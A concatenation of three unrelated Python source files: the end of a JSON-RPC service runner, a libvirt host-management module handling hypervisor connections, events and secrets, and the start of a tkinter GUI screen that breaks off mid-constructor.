# (wsgiref), listening on port 9999 by default, execute this file directly
#
try:
import uwsgi
# Before we do anything with the application, see if the
# configs specify patching all std routines to be asynch
# *ONLY* use this if you are going to wrap the service in
# a wsgi container that has enabled gevent, such as
# uwsgi with the --gevent option
if config is not None and config.get('gevent_monkeypatch_all', False):
print("Monkeypatching std libraries for async")
from gevent import monkey
monkey.patch_all()
uwsgi.applications = {'': application}
except ImportError:
# Not available outside of wsgi, ignore
pass
_proc = None
def start_server(host='localhost', port=0, newprocess=False):
'''
By default, start the server on localhost on a system-assigned port in
the main thread. Execution of the main thread will stay in the server
main loop until interrupted. To run the server in a separate process,
and thus allow the stop_server method to be called, set newprocess=True.
This also allows the assigned port number to be returned.'''
global _proc
if _proc:
raise RuntimeError('server is already running')
httpd = make_server(host, port, application)
port = httpd.server_address[1]
print("Listening on port %s" % port)
if newprocess:
_proc = Process(target=httpd.serve_forever)
_proc.daemon = True
_proc.start()
else:
httpd.serve_forever()
return port
def stop_server():
global _proc
_proc.terminate()
_proc = None
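# Illustrative sketch (not part of the generated server): start the service
# in a child process, issue one JSON-RPC 1.1 call against it, then stop it.
# The method name and empty params are placeholders; unauthenticated calls
# only work for methods whose authentication requirement is 'none'.
def _example_run_and_call():
    port = start_server(newprocess=True)
    try:
        body = {'version': '1.1', 'id': '1',
                'method': 'NWChemKbase.status', 'params': []}
        resp = _requests.post('http://localhost:%s' % port,
                              data=json.dumps(body), timeout=30)
        print(resp.json())
    finally:
        stop_server()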
def process_async_cli(input_file_path, output_file_path, token):
exit_code = 0
with open(input_file_path) as data_file:
req = json.load(data_file)
if 'version' not in req:
req['version'] = '1.1'
if 'id' not in req:
req['id'] = str(_random.random())[2:]
ctx = MethodContext(application.userlog)
if token:
user = application.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
if 'context' in req:
ctx['rpc_context'] = req['context']
ctx['CLI'] = 1
ctx['module'], ctx['method'] = req['method'].split('.')
prov_action = {'service': ctx['module'], 'method': ctx['method'],
'method_params': req['params']}
ctx['provenance'] = [prov_action]
resp = None
try:
resp = application.rpc_service.call_py(ctx, req)
except JSONRPCError as jre:
trace = jre.trace if hasattr(jre, 'trace') else None
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': jre.code,
'name': jre.message,
'message': jre.data,
'error': trace}
}
except Exception:
trace = traceback.format_exc()
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error occurred',
'error': trace}
}
if 'error' in resp:
exit_code = 500
with open(output_file_path, "w") as f:
f.write(json.dumps(resp, cls=JSONObjectEncoder))
return exit_code
if __name__ == "__main__":
if (len(sys.argv) >= 3 and len(sys.argv) <= 4 and
os.path.isfile(sys.argv[1])):
token = None
if len(sys.argv) == 4:
if os.path.isfile(sys.argv[3]):
with open(sys.argv[3]) as token_file:
token = token_file.read()
else:
token = sys.argv[3]
sys.exit(process_async_cli(sys.argv[1], sys.argv[2], token))
try:
opts, args = getopt(sys.argv[1:], "", ["port=", "host="])
except GetoptError as err:
# print help information and exit:
print(str(err)) # will print something like "option -a not recognized"
sys.exit(2)
port = 9999
host = 'localhost'
for o, a in opts:
if o == '--port':
port = int(a)
elif o == '--host':
host = a
print("Host set to %s" % host)
else:
assert False, "unhandled option"
start_server(host=host, port=port)
# print("Listening on port %s" % port)
# httpd = make_server( host, port, application)
#
# httpd.serve_forever()
|
host.py
|
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
# Copyright (c) 2010 Citrix Systems, Inc.
# Copyright (c) 2011 Piston Cloud Computing, Inc
# Copyright (c) 2012 University Of Minho
# (c) Copyright 2013 Hewlett-Packard Development Company, L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Manages information about the host OS and hypervisor.
This class encapsulates a connection to the libvirt
daemon and provides certain higher level APIs around
the raw libvirt API. These APIs are then used by all
the other libvirt related classes
"""
import operator
import os
import socket
import threading
import eventlet
from eventlet import greenio
from eventlet import greenthread
from eventlet import patcher
from eventlet import tpool
from oslo_config import cfg
from oslo_log import log as logging
from oslo_utils import excutils
from patron import context as patron_context
from patron import exception
from patron.i18n import _
from patron.i18n import _LE
from patron.i18n import _LI
from patron.i18n import _LW
from patron import rpc
from patron import utils
from patron.virt import event as virtevent
from patron.virt.libvirt import compat
from patron.virt.libvirt import config as vconfig
libvirt = None
LOG = logging.getLogger(__name__)
native_socket = patcher.original('socket')
native_threading = patcher.original("threading")
native_Queue = patcher.original("Queue")
CONF = cfg.CONF
CONF.import_opt('host', 'patron.netconf')
CONF.import_opt('my_ip', 'patron.netconf')
class DomainJobInfo(object):
"""Information about libvirt background jobs
This class encapsulates information about libvirt
background jobs. It provides a mapping from either
the old virDomainGetJobInfo API which returned a
fixed list of fields, or the modern virDomainGetJobStats
which returns an extendable dict of fields.
"""
_have_job_stats = True
def __init__(self, **kwargs):
self.type = kwargs.get("type", libvirt.VIR_DOMAIN_JOB_NONE)
self.time_elapsed = kwargs.get("time_elapsed", 0)
self.time_remaining = kwargs.get("time_remaining", 0)
self.downtime = kwargs.get("downtime", 0)
self.setup_time = kwargs.get("setup_time", 0)
self.data_total = kwargs.get("data_total", 0)
self.data_processed = kwargs.get("data_processed", 0)
self.data_remaining = kwargs.get("data_remaining", 0)
self.memory_total = kwargs.get("memory_total", 0)
self.memory_processed = kwargs.get("memory_processed", 0)
self.memory_remaining = kwargs.get("memory_remaining", 0)
self.memory_constant = kwargs.get("memory_constant", 0)
self.memory_normal = kwargs.get("memory_normal", 0)
self.memory_normal_bytes = kwargs.get("memory_normal_bytes", 0)
self.memory_bps = kwargs.get("memory_bps", 0)
self.disk_total = kwargs.get("disk_total", 0)
self.disk_processed = kwargs.get("disk_processed", 0)
self.disk_remaining = kwargs.get("disk_remaining", 0)
self.disk_bps = kwargs.get("disk_bps", 0)
self.comp_cache = kwargs.get("compression_cache", 0)
self.comp_bytes = kwargs.get("compression_bytes", 0)
self.comp_pages = kwargs.get("compression_pages", 0)
self.comp_cache_misses = kwargs.get("compression_cache_misses", 0)
self.comp_overflow = kwargs.get("compression_overflow", 0)
@classmethod
def _get_job_stats_compat(cls, dom):
# Make the old virDomainGetJobInfo method look similar to the
# modern virDomainGetJobStats method
try:
info = dom.jobInfo()
except libvirt.libvirtError as ex:
# When migration of a transient guest completes, the guest
# goes away so we'll see NO_DOMAIN error code
#
# When migration of a persistent guest completes, the guest
# merely shuts off, but libvirt unhelpfully raises an
# OPERATION_INVALID error code
#
# Lets pretend both of these mean success
if ex.get_error_code() in (libvirt.VIR_ERR_NO_DOMAIN,
libvirt.VIR_ERR_OPERATION_INVALID):
LOG.debug("Domain has shutdown/gone away: %s", ex)
return cls(type=libvirt.VIR_DOMAIN_JOB_COMPLETED)
else:
LOG.debug("Failed to get job info: %s", ex)
raise
return cls(
type=info[0],
time_elapsed=info[1],
time_remaining=info[2],
data_total=info[3],
data_processed=info[4],
data_remaining=info[5],
memory_total=info[6],
memory_processed=info[7],
memory_remaining=info[8],
disk_total=info[9],
disk_processed=info[10],
disk_remaining=info[11])
@classmethod
def for_domain(cls, dom):
'''Get job info for the domain
Query the libvirt job info for the domain (ie progress
of migration, or snapshot operation)
Returns: a DomainJobInfo instance
'''
if cls._have_job_stats:
try:
stats = dom.jobStats()
return cls(**stats)
except libvirt.libvirtError as ex:
if ex.get_error_code() == libvirt.VIR_ERR_NO_SUPPORT:
# Remote libvirt doesn't support new API
LOG.debug("Missing remote virDomainGetJobStats: %s", ex)
cls._have_job_stats = False
return cls._get_job_stats_compat(dom)
elif ex.get_error_code() in (
libvirt.VIR_ERR_NO_DOMAIN,
libvirt.VIR_ERR_OPERATION_INVALID):
# Transient guest finished migration, so it has gone
# away completely
LOG.debug("Domain has shutdown/gone away: %s", ex)
return cls(type=libvirt.VIR_DOMAIN_JOB_COMPLETED)
else:
LOG.debug("Failed to get job stats: %s", ex)
raise
except AttributeError as ex:
# Local python binding doesn't support new API
LOG.debug("Missing local virDomainGetJobStats: %s", ex)
cls._have_job_stats = False
return cls._get_job_stats_compat(dom)
else:
return cls._get_job_stats_compat(dom)
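# Illustrative sketch (not part of the original module): poll job progress
# (e.g. during a live migration) for a libvirt domain. The caller is assumed
# to have obtained `dom` via Host.get_domain() so that the lazily imported
# libvirt module is already loaded; the 1 second interval is arbitrary.
def _example_poll_job_info(dom):
    import time
    while True:
        info = DomainJobInfo.for_domain(dom)
        if info.type in (libvirt.VIR_DOMAIN_JOB_NONE,
                         libvirt.VIR_DOMAIN_JOB_COMPLETED):
            break
        LOG.debug("job progress: %(done)d of %(total)d bytes",
                  {'done': info.data_processed, 'total': info.data_total})
        time.sleep(1)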
class Host(object):
def __init__(self, uri, read_only=False,
conn_event_handler=None,
lifecycle_event_handler=None):
global libvirt
if libvirt is None:
libvirt = __import__('libvirt')
self._uri = uri
self._read_only = read_only
self._conn_event_handler = conn_event_handler
self._lifecycle_event_handler = lifecycle_event_handler
self._skip_list_all_domains = False
self._caps = None
self._hostname = None
self._wrapped_conn = None
self._wrapped_conn_lock = threading.Lock()
self._event_queue = None
self._events_delayed = {}
# Note(toabctl): During a reboot of a Xen domain, STOPPED and
# STARTED events are sent. To prevent shutting
# down the domain during a reboot, delay the
# STOPPED lifecycle event some seconds.
if uri.find("xen://") != -1:
self._lifecycle_delay = 15
else:
self._lifecycle_delay = 0
def _native_thread(self):
"""Receives async events coming in from libvirtd.
This is a native thread which runs the default
libvirt event loop implementation. This processes
any incoming async events from libvirtd and queues
them for later dispatch. This thread is only
permitted to use libvirt python APIs, and the
driver.queue_event method. In particular any use
of logging is forbidden, since it will confuse
eventlet's greenthread integration
"""
while True:
libvirt.virEventRunDefaultImpl()
def _dispatch_thread(self):
"""Dispatches async events coming in from libvirtd.
This is a green thread which waits for events to
arrive from the libvirt event loop thread. This
then dispatches the events to the compute manager.
"""
while True:
self._dispatch_events()
@staticmethod
def _event_lifecycle_callback(conn, dom, event, detail, opaque):
"""Receives lifecycle events from libvirt.
NB: this method is executing in a native thread, not
an eventlet coroutine. It can only invoke other libvirt
APIs, or use self._queue_event(). Any use of logging APIs
in particular is forbidden.
"""
self = opaque
uuid = dom.UUIDString()
transition = None
if event == libvirt.VIR_DOMAIN_EVENT_STOPPED:
transition = virtevent.EVENT_LIFECYCLE_STOPPED
elif event == libvirt.VIR_DOMAIN_EVENT_STARTED:
transition = virtevent.EVENT_LIFECYCLE_STARTED
elif event == libvirt.VIR_DOMAIN_EVENT_SUSPENDED:
transition = virtevent.EVENT_LIFECYCLE_PAUSED
elif event == libvirt.VIR_DOMAIN_EVENT_RESUMED:
transition = virtevent.EVENT_LIFECYCLE_RESUMED
if transition is not None:
self._queue_event(virtevent.LifecycleEvent(uuid, transition))
def _close_callback(self, conn, reason, opaque):
close_info = {'conn': conn, 'reason': reason}
self._queue_event(close_info)
@staticmethod
def _test_connection(conn):
try:
conn.getLibVersion()
return True
except libvirt.libvirtError as e:
if (e.get_error_code() in (libvirt.VIR_ERR_SYSTEM_ERROR,
libvirt.VIR_ERR_INTERNAL_ERROR) and
e.get_error_domain() in (libvirt.VIR_FROM_REMOTE,
libvirt.VIR_FROM_RPC)):
LOG.debug('Connection to libvirt broke')
return False
raise
@staticmethod
def _connect_auth_cb(creds, opaque):
if len(creds) == 0:
return 0
raise exception.PatronException(
_("Can not handle authentication request for %d credentials")
% len(creds))
@staticmethod
def _connect(uri, read_only):
auth = [[libvirt.VIR_CRED_AUTHNAME,
libvirt.VIR_CRED_ECHOPROMPT,
libvirt.VIR_CRED_REALM,
libvirt.VIR_CRED_PASSPHRASE,
libvirt.VIR_CRED_NOECHOPROMPT,
libvirt.VIR_CRED_EXTERNAL],
Host._connect_auth_cb,
None]
flags = 0
if read_only:
flags = libvirt.VIR_CONNECT_RO
# tpool.proxy_call creates a native thread. Due to limitations
# with eventlet locking we cannot use the logging API inside
# the called function.
return tpool.proxy_call(
(libvirt.virDomain, libvirt.virConnect),
libvirt.openAuth, uri, auth, flags)
def _queue_event(self, event):
"""Puts an event on the queue for dispatch.
This method is called by the native event thread to
put events on the queue for later dispatch by the
green thread. Any use of logging APIs is forbidden.
"""
if self._event_queue is None:
return
# Queue the event...
self._event_queue.put(event)
# ...then wakeup the green thread to dispatch it
c = ' '.encode()
self._event_notify_send.write(c)
self._event_notify_send.flush()
def _dispatch_events(self):
"""Wait for & dispatch events from native thread
Blocks until native thread indicates some events
are ready. Then dispatches all queued events.
"""
# Wait to be notified that there are some
# events pending
try:
_c = self._event_notify_recv.read(1)
assert _c
except ValueError:
return # will be raised when pipe is closed
# Process as many events as possible without
# blocking
last_close_event = None
while not self._event_queue.empty():
try:
event = self._event_queue.get(block=False)
if isinstance(event, virtevent.LifecycleEvent):
# call possibly with delay
self._event_emit_delayed(event)
elif 'conn' in event and 'reason' in event:
last_close_event = event
except native_Queue.Empty:
pass
if last_close_event is None:
return
conn = last_close_event['conn']
# get_new_connection may already have disabled the host,
# in which case _wrapped_conn is None.
with self._wrapped_conn_lock:
if conn == self._wrapped_conn:
reason = str(last_close_event['reason'])
msg = _("Connection to libvirt lost: %s") % reason
self._wrapped_conn = None
if self._conn_event_handler is not None:
self._conn_event_handler(False, msg)
def _event_emit_delayed(self, event):
"""Emit events - possibly delayed."""
def event_cleanup(gt, *args, **kwargs):
"""Callback function for greenthread. Called
to cleanup the _events_delayed dictionary when a event
was called.
"""
event = args[0]
self._events_delayed.pop(event.uuid, None)
if self._lifecycle_delay > 0:
# Cleanup possible delayed stop events.
if event.uuid in self._events_delayed.keys():
self._events_delayed[event.uuid].cancel()
self._events_delayed.pop(event.uuid, None)
LOG.debug("Removed pending event for %s due to "
"lifecycle event", event.uuid)
if event.transition == virtevent.EVENT_LIFECYCLE_STOPPED:
# Delay STOPPED events, as they may be followed by a STARTED
# event when the instance is rebooting (e.g. when run with Xen)
id_ = greenthread.spawn_after(self._lifecycle_delay,
self._event_emit, event)
self._events_delayed[event.uuid] = id_
# add callback to cleanup self._events_delayed dict after
# event was called
id_.link(event_cleanup, event)
else:
self._event_emit(event)
else:
self._event_emit(event)
def _event_emit(self, event):
if self._lifecycle_event_handler is not None:
self._lifecycle_event_handler(event)
def _init_events_pipe(self):
"""Create a self-pipe for the native thread to synchronize on.
This code is taken from the eventlet tpool module, under terms
of the Apache License v2.0.
"""
self._event_queue = native_Queue.Queue()
try:
rpipe, wpipe = os.pipe()
self._event_notify_send = greenio.GreenPipe(wpipe, 'wb', 0)
self._event_notify_recv = greenio.GreenPipe(rpipe, 'rb', 0)
except (ImportError, NotImplementedError):
# This is Windows compatibility -- use a socket instead
# of a pipe because pipes don't really exist on Windows.
sock = native_socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind(('localhost', 0))
sock.listen(50)
csock = native_socket.socket(socket.AF_INET, socket.SOCK_STREAM)
csock.connect(('localhost', sock.getsockname()[1]))
nsock, addr = sock.accept()
self._event_notify_send = nsock.makefile('wb', 0)
gsock = greenio.GreenSocket(csock)
self._event_notify_recv = gsock.makefile('rb', 0)
def _init_events(self):
"""Initializes the libvirt events subsystem.
This requires running a native thread to provide the
libvirt event loop integration. This forwards events
to a green thread which does the actual dispatching.
"""
self._init_events_pipe()
LOG.debug("Starting native event thread")
self._event_thread = native_threading.Thread(
target=self._native_thread)
self._event_thread.setDaemon(True)
self._event_thread.start()
LOG.debug("Starting green dispatch thread")
eventlet.spawn(self._dispatch_thread)
def _get_new_connection(self):
# call with _wrapped_conn_lock held
LOG.debug('Connecting to libvirt: %s', self._uri)
wrapped_conn = None
try:
wrapped_conn = self._connect(self._uri, self._read_only)
finally:
# Enabling the compute service, in case it was disabled
# since the connection was successful.
disable_reason = None
if not wrapped_conn:
disable_reason = 'Failed to connect to libvirt'
if self._conn_event_handler is not None:
self._conn_event_handler(bool(wrapped_conn), disable_reason)
self._wrapped_conn = wrapped_conn
try:
LOG.debug("Registering for lifecycle events %s", self)
wrapped_conn.domainEventRegisterAny(
None,
libvirt.VIR_DOMAIN_EVENT_ID_LIFECYCLE,
self._event_lifecycle_callback,
self)
except Exception as e:
LOG.warn(_LW("URI %(uri)s does not support events: %(error)s"),
{'uri': self._uri, 'error': e})
try:
LOG.debug("Registering for connection events: %s", str(self))
wrapped_conn.registerCloseCallback(self._close_callback, None)
except (TypeError, AttributeError) as e:
# NOTE: The registerCloseCallback of python-libvirt 1.0.1+
# is defined with 3 arguments, and the above registerClose-
# Callback succeeds. However, the one of python-libvirt 1.0.0
# is defined with 4 arguments and TypeError happens here.
# Then python-libvirt 0.9 does not define a method register-
# CloseCallback.
LOG.debug("The version of python-libvirt does not support "
"registerCloseCallback or is too old: %s", e)
except libvirt.libvirtError as e:
LOG.warn(_LW("URI %(uri)s does not support connection"
" events: %(error)s"),
{'uri': self._uri, 'error': e})
return wrapped_conn
def _get_connection(self):
# multiple concurrent connections are protected by _wrapped_conn_lock
with self._wrapped_conn_lock:
wrapped_conn = self._wrapped_conn
if not wrapped_conn or not self._test_connection(wrapped_conn):
wrapped_conn = self._get_new_connection()
return wrapped_conn
def get_connection(self):
"""Returns a connection to the hypervisor
This method should be used to create and return a well
configured connection to the hypervisor.
:returns: a libvirt.virConnect object
"""
try:
conn = self._get_connection()
except libvirt.libvirtError as ex:
LOG.exception(_LE("Connection to libvirt failed: %s"), ex)
payload = dict(ip=CONF.my_ip,
method='_connect',
reason=ex)
rpc.get_notifier('compute').error(patron_context.get_admin_context(),
'compute.libvirt.error',
payload)
raise exception.HypervisorUnavailable(host=CONF.host)
return conn
@staticmethod
def _libvirt_error_handler(context, err):
# Just ignore instead of default outputting to stderr.
pass
def initialize(self):
# NOTE(dkliban): Error handler needs to be registered before libvirt
# connection is used for the first time. Otherwise, the
# handler does not get registered.
libvirt.registerErrorHandler(self._libvirt_error_handler, None)
libvirt.virEventRegisterDefaultImpl()
self._init_events()
def _version_check(self, lv_ver=None, hv_ver=None, hv_type=None,
op=operator.lt):
conn = self.get_connection()
try:
if lv_ver is not None:
libvirt_version = conn.getLibVersion()
if op(libvirt_version, utils.convert_version_to_int(lv_ver)):
return False
if hv_ver is not None:
hypervisor_version = conn.getVersion()
if op(hypervisor_version,
utils.convert_version_to_int(hv_ver)):
return False
if hv_type is not None:
hypervisor_type = conn.getType()
if hypervisor_type != hv_type:
return False
return True
except Exception:
return False
def has_min_version(self, lv_ver=None, hv_ver=None, hv_type=None):
return self._version_check(
lv_ver=lv_ver, hv_ver=hv_ver, hv_type=hv_type, op=operator.lt)
def has_version(self, lv_ver=None, hv_ver=None, hv_type=None):
return self._version_check(
lv_ver=lv_ver, hv_ver=hv_ver, hv_type=hv_type, op=operator.ne)
def get_domain(self, instance):
"""Retrieve libvirt domain object for an instance.
:param instance: a patron.objects.Instance object
Attempt to look up the libvirt domain object
corresponding to the patron instance, based on
its name. If not found it will raise an
exception.InstanceNotFound exception. On other
errors, it will raise an exception.PatronException
exception.
:returns: a libvirt.Domain object
"""
return self._get_domain_by_name(instance.name)
def _get_domain_by_id(self, instance_id):
"""Retrieve libvirt domain object given an instance id.
All libvirt error handling should be handled in this method and
relevant patron exceptions should be raised in response.
"""
try:
conn = self.get_connection()
return conn.lookupByID(instance_id)
except libvirt.libvirtError as ex:
error_code = ex.get_error_code()
if error_code == libvirt.VIR_ERR_NO_DOMAIN:
raise exception.InstanceNotFound(instance_id=instance_id)
msg = (_("Error from libvirt while looking up %(instance_id)s: "
"[Error Code %(error_code)s] %(ex)s")
% {'instance_id': instance_id,
'error_code': error_code,
'ex': ex})
raise exception.PatronException(msg)
def _get_domain_by_name(self, instance_name):
"""Retrieve libvirt domain object given an instance name.
All libvirt error handling should be handled in this method and
relevant patron exceptions should be raised in response.
"""
try:
conn = self.get_connection()
return conn.lookupByName(instance_name)
except libvirt.libvirtError as ex:
error_code = ex.get_error_code()
if error_code == libvirt.VIR_ERR_NO_DOMAIN:
raise exception.InstanceNotFound(instance_id=instance_name)
msg = (_('Error from libvirt while looking up %(instance_name)s: '
'[Error Code %(error_code)s] %(ex)s') %
{'instance_name': instance_name,
'error_code': error_code,
'ex': ex})
raise exception.PatronException(msg)
def _list_instance_domains_fast(self, only_running=True):
# The modern (>= 0.9.13) fast way - 1 single API call for all domains
flags = libvirt.VIR_CONNECT_LIST_DOMAINS_ACTIVE
if not only_running:
flags = flags | libvirt.VIR_CONNECT_LIST_DOMAINS_INACTIVE
return self.get_connection().listAllDomains(flags)
def _list_instance_domains_slow(self, only_running=True):
# The legacy (< 0.9.13) slow way - O(n) API call for n domains
uuids = []
doms = []
# Redundant numOfDomains check is for libvirt bz #836647
if self.get_connection().numOfDomains() > 0:
for id in self.get_connection().listDomainsID():
try:
dom = self._get_domain_by_id(id)
doms.append(dom)
uuids.append(dom.UUIDString())
except exception.InstanceNotFound:
continue
if only_running:
return doms
for name in self.get_connection().listDefinedDomains():
try:
dom = self._get_domain_by_name(name)
if dom.UUIDString() not in uuids:
doms.append(dom)
except exception.InstanceNotFound:
continue
return doms
def list_instance_domains(self, only_running=True, only_guests=True):
"""Get a list of libvirt.Domain objects for patron instances
:param only_running: True to only return running instances
:param only_guests: True to filter out any host domain (eg Dom-0)
Query libvirt to get a list of all libvirt.Domain objects
that correspond to patron instances. If the only_running parameter
is true this list will only include active domains, otherwise
inactive domains will be included too. If the only_guests parameter
is true the list will have any "host" domain (aka Xen Domain-0)
filtered out.
:returns: list of libvirt.Domain objects
"""
if not self._skip_list_all_domains:
try:
alldoms = self._list_instance_domains_fast(only_running)
except (libvirt.libvirtError, AttributeError) as ex:
LOG.info(_LI("Unable to use bulk domain list APIs, "
"falling back to slow code path: %(ex)s"),
{'ex': ex})
self._skip_list_all_domains = True
if self._skip_list_all_domains:
# Old libvirt, or a libvirt driver which doesn't
# implement the new API
alldoms = self._list_instance_domains_slow(only_running)
doms = []
for dom in alldoms:
if only_guests and dom.ID() == 0:
continue
doms.append(dom)
return doms
def get_online_cpus(self):
"""Get the set of CPUs that are online on the host
Method is only used by NUMA code paths, which check that the
libvirt version >= 1.0.4. getCPUMap() was introduced in
libvirt 1.0.0.
:returns: set of online CPUs, raises libvirtError on error
"""
(cpus, cpu_map, online) = self.get_connection().getCPUMap()
online_cpus = set()
for cpu in range(cpus):
if cpu_map[cpu]:
online_cpus.add(cpu)
return online_cpus
def get_capabilities(self):
"""Returns the host capabilities information
Returns an instance of config.LibvirtConfigCaps representing
the capabilities of the host.
Note: The result is cached in the member attribute _caps.
:returns: a config.LibvirtConfigCaps object
"""
if not self._caps:
xmlstr = self.get_connection().getCapabilities()
LOG.info(_LI("Libvirt host capabilities %s"), xmlstr)
self._caps = vconfig.LibvirtConfigCaps()
self._caps.parse_str(xmlstr)
if hasattr(libvirt, 'VIR_CONNECT_BASELINE_CPU_EXPAND_FEATURES'):
try:
features = self.get_connection().baselineCPU(
[self._caps.host.cpu.to_xml()],
libvirt.VIR_CONNECT_BASELINE_CPU_EXPAND_FEATURES)
# FIXME(wangpan): the return value of baselineCPU should be
# None or xml string, but libvirt has a bug
# of it from 1.1.2 which is fixed in 1.2.0,
# this -1 checking should be removed later.
if features and features != -1:
cpu = vconfig.LibvirtConfigCPU()
cpu.parse_str(features)
self._caps.host.cpu.features = cpu.features
except libvirt.libvirtError as ex:
error_code = ex.get_error_code()
if error_code == libvirt.VIR_ERR_NO_SUPPORT:
LOG.warn(_LW("URI %(uri)s does not support full set"
" of host capabilities: " "%(error)s"),
{'uri': self._uri, 'error': ex})
else:
raise
return self._caps
def get_driver_type(self):
"""Get hypervisor type.
:returns: hypervisor type (ex. qemu)
"""
return self.get_connection().getType()
def get_version(self):
"""Get hypervisor version.
:returns: hypervisor version (ex. 12003)
"""
return self.get_connection().getVersion()
def get_hostname(self):
"""Returns the hostname of the hypervisor."""
hostname = self.get_connection().getHostname()
if self._hostname is None:
self._hostname = hostname
elif hostname != self._hostname:
LOG.error(_LE('Hostname has changed from %(old)s '
'to %(new)s. A restart is required to take effect.'),
{'old': self._hostname,
'new': hostname})
return self._hostname
def find_secret(self, usage_type, usage_id):
"""Find a secret.
usage_type: one of 'iscsi', 'ceph', 'rbd' or 'volume'
usage_id: name of resource in secret
"""
if usage_type == 'iscsi':
usage_type_const = libvirt.VIR_SECRET_USAGE_TYPE_ISCSI
elif usage_type in ('rbd', 'ceph'):
usage_type_const = libvirt.VIR_SECRET_USAGE_TYPE_CEPH
elif usage_type == 'volume':
usage_type_const = libvirt.VIR_SECRET_USAGE_TYPE_VOLUME
else:
msg = _("Invalid usage_type: %s")
raise exception.PatronException(msg % usage_type)
try:
conn = self.get_connection()
return conn.secretLookupByUsage(usage_type_const, usage_id)
except libvirt.libvirtError as e:
if e.get_error_code() == libvirt.VIR_ERR_NO_SECRET:
return None
def create_secret(self, usage_type, usage_id, password=None):
"""Create a secret.
usage_type: one of 'iscsi', 'ceph', 'rbd' or 'volume'
'rbd' will be converted to 'ceph'.
usage_id: name of resource in secret
"""
secret_conf = vconfig.LibvirtConfigSecret()
secret_conf.ephemeral = False
secret_conf.private = False
secret_conf.usage_id = usage_id
if usage_type in ('rbd', 'ceph'):
secret_conf.usage_type = 'ceph'
elif usage_type == 'iscsi':
secret_conf.usage_type = 'iscsi'
elif usage_type == 'volume':
secret_conf.usage_type = 'volume'
else:
msg = _("Invalid usage_type: %s")
raise exception.PatronException(msg % usage_type)
xml = secret_conf.to_xml()
try:
LOG.debug('Secret XML: %s' % xml)
conn = self.get_connection()
secret = conn.secretDefineXML(xml)
if password is not None:
secret.setValue(password)
return secret
except libvirt.libvirtError:
with excutils.save_and_reraise_exception():
LOG.error(_LE('Error defining a secret with XML: %s') % xml)
def delete_secret(self, usage_type, usage_id):
"""Delete a secret.
usage_type: one of 'iscsi', 'ceph', 'rbd' or 'volume'
usage_id: name of resource in secret
"""
secret = self.find_secret(usage_type, usage_id)
if secret is not None:
secret.undefine()
def get_domain_info(self, virt_dom):
return compat.get_domain_info(libvirt, self, virt_dom)
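# Hedged usage sketch (not part of this module): how the methods above might be
# driven by calling code. `host` stands in for an instance of the host class
# defined above, and 'my-volume-uuid' is purely illustrative.
def _example_host_usage(host):
    # Enumerate running guest domains, skipping the hypervisor's own domain 0.
    for dom in host.list_instance_domains(only_running=True, only_guests=True):
        print(dom.name(), dom.UUIDString())
    # Secret lifecycle for a volume: define it, look it up, then remove it.
    host.create_secret('volume', 'my-volume-uuid', password='s3cret')
    secret = host.find_secret('volume', 'my-volume-uuid')
    if secret is not None:
        host.delete_secret('volume', 'my-volume-uuid')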
|
Screen4.py
|
import os
import threading
import tkinter.messagebox
import webbrowser
from tkinter import *
from tkinter import ttk, filedialog
from PIL import ImageTk, Image
from pdf2image import convert_from_path
from threading import *
class Card:
def __init__(self, path, label):
self.label = label
self.selected = False
self.path = path
class Screen4(Frame):
def __init__(self, window):
Frame.__init__(self, window)
self.count = 0
self.switch = False
self.x_option = 97
self.y_option = 209
self.drop_switch = False
self.row = 0
self.col = 0
self.images = []
self.cards = []
self.files = []
self.section = None
self.selected_cards = []
self.options = []
self.window = window
self.currIndex = None
self.window.configure(bg="#83568a")
self.canvas = Canvas(
self,
bg="#83568a",
height=1024,
width=1440,
bd=0,
highlightthickness=0,
relief="ridge")
self.canvas.place(x=0, y=0)
self.background_img = PhotoImage(file=f"resources/images/screen4/background.png")
self.background = self.canvas.create_image(
688.5, 86.0,
image=self.background_img)
self.img0 = PhotoImage(file=f"resources/images/screen4/img0.png")
self.b0 = Label(
image=self.img0,
borderwidth=0,
highlightthickness=0,
relief="flat")
self.b0.place (
x=-10, y=228,
width=339,
height=749)
self.img1 = PhotoImage (file=f"resources/images/screen4/img1.png")
self.img1_hover = PhotoImage (file=f"resources/images/screen4/img1_hover.png")
self.b1 = Label (
image=self.img1,
borderwidth=0,
highlightthickness=0,
relief="flat")
self.b1.place (
x=21, y=164,
width=56,
height=42)
self.b1.bind ("<Button-1>", lambda e: self.animate())
self.img2 = PhotoImage (file=f"resources/images/screen4/img2.png")
self.img2_hover = PhotoImage (file=f"resources/images/screen4/img2_hover.png")
self.b2 = Label(
image=self.img2,
borderwidth=0,
highlightthickness=0,
relief="flat")
self.b2.place (
x=35, y=279,
width=238,
height=86)
self.b2.bind("<Button-1>", lambda e: self.initialize_new_section(self.window.current_subject.assignments))
self.img3 = PhotoImage(file=f"resources/images/screen4/img3.png")
self.img3_hover = PhotoImage(file=f"resources/images/screen4/img3_hover.png")
self.b3 = Label(
image=self.img3,
borderwidth=0,
highlightthickness=0,
relief="flat")
self.b3.place (
x=33, y=405,
width=238,
height=86)
self.b3.bind("<Button-1>", lambda e: self.initialize_new_section(self.window.current_subject.quizzes))
self.img4 = PhotoImage(file=f"resources/images/screen4/img4.png")
self.img4_hover = PhotoImage(file=f"resources/images/screen4/img4_hover.png")
self.b4 = Label(
image=self.img4,
borderwidth=0,
highlightthickness=0,
relief="flat")
self.b4.place (
x=33, y=538,
width=238,
height=86)
self.b4.bind("<Button-1>", lambda e: self.initialize_new_section(self.window.current_subject.midterms))
self.img5 = PhotoImage (file=f"resources/images/screen4/img5.png")
self.img5_hover = PhotoImage (file=f"resources/images/screen4/img5_hover.png")
self.b5 = Label(
image=self.img5,
borderwidth=0,
highlightthickness=0,
relief="flat")
self.b5.place(
x=33, y=671,
width=238,
height=86)
